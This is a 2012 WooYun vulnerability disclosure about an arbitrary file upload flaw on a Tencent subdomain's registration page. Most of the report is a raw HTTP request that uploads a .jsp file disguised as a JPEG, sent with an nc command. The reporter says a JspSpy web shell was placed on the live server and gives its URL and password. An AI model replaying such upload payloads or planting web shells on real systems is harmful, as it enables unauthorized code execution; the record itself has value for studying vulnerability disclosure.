当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07463

漏洞标题:腾讯某分站任意文件上传漏洞

相关厂商:腾讯

漏洞作者: Jannock

提交时间:2012-05-23 20:06

修复时间:2012-07-07 20:07

公开时间:2012-07-07 20:07

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-23: 细节已通知厂商并且等待厂商处理中
2012-05-23: 厂商已经确认,细节仅向厂商公开
2012-06-02: 细节向核心白帽子及相关领域专家公开
2012-06-12: 细节向普通白帽子公开
2012-06-22: 细节向实习白帽子公开
2012-07-07: 细节向公众公开

简要描述:

腾讯某分站任意文件上传漏洞,可导致拿shell

详细说明:

http://tap.3g.qq.com:8080/mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg
注册页面。
身份证扫描件 处上传,可直接上传任意文件。记得验证码处要乱填,这样才会返回上传后的地址。
下面是nc提交
POST /mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg HTTP/1.1
Host: tap.3g.qq.com:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Connection: keep-alive
Referer: http://tap.3g.qq.com:8080/mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg
Cookie: JSESSIONID=ft7AHd82i0g7rMg5Dt
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 2679
-----------------------------24464570528145
Content-Disposition: form-data; name="MVC_BUS"
CPRegister
-----------------------------24464570528145
Content-Disposition: form-data; name="MVC_ACTION"
NocpReg
-----------------------------24464570528145
Content-Disposition: form-data; name="agreeProtocol"
yes
-----------------------------24464570528145
Content-Disposition: form-data; name="codevalid"
-----------------------------24464570528145
Content-Disposition: form-data; name="isEdit"
false
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_username"
aaaaaaabcd
-----------------------------24464570528145
Content-Disposition: form-data; name="newpwd"
111111
-----------------------------24464570528145
Content-Disposition: form-data; name="newpwd_again"
111111
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_name"
aaaaaaabcd
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_person"
aaaaaaabcd
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_mobilephone"
13800138001
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contacttel1"
333-3-55555555
-----------------------------24464570528145
Content-Disposition: form-data; name="province"
2
-----------------------------24464570528145
Content-Disposition: form-data; name="city"
2
-----------------------------24464570528145
Content-Disposition: form-data; name="area"
21
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_qq"
16104383133
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_email"
[email protected]
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_identitycode"
610722197909188715
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_cert_image"; filename="watermarkpreview.jsp"
Content-Type: image/jpeg
xxxxxx
-----------------------------24464570528145
Content-Disposition: form-data; name="cert_image"
http://tap.3g.qq.com:8080/certs/6513B59E371497A2FCAF47E6EC495666.jpg
-----------------------------24464570528145
Content-Disposition: form-data; name="code"
qmqj
-----------------------------24464570528145
Content-Disposition: form-data; name="codesid"
4TTWIX8F53WF3MOISJ7WDHXONNYYYGUU
-----------------------------24464570528145
Content-Disposition: form-data; name="randomSeed"
1115945018
-----------------------------24464570528145--
注意到
cp_cert_image 字段哦。
nc tap.3g.qq.com 8080<1.txt
查看返回即可以找到上传后的文件路径。
http://tap.3g.qq.com:8080/certs/9AFF900FA65CF142E0506EBFC87A23D3.jsp
随便网上找的一个马,密码是:jspspy
你们删除吧!

漏洞证明:



修复方案:

应该懂得!

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-05-23 20:47

厂商回复:

非常感谢您的报告,我们已在紧急处理此问题。

最新状态:

暂无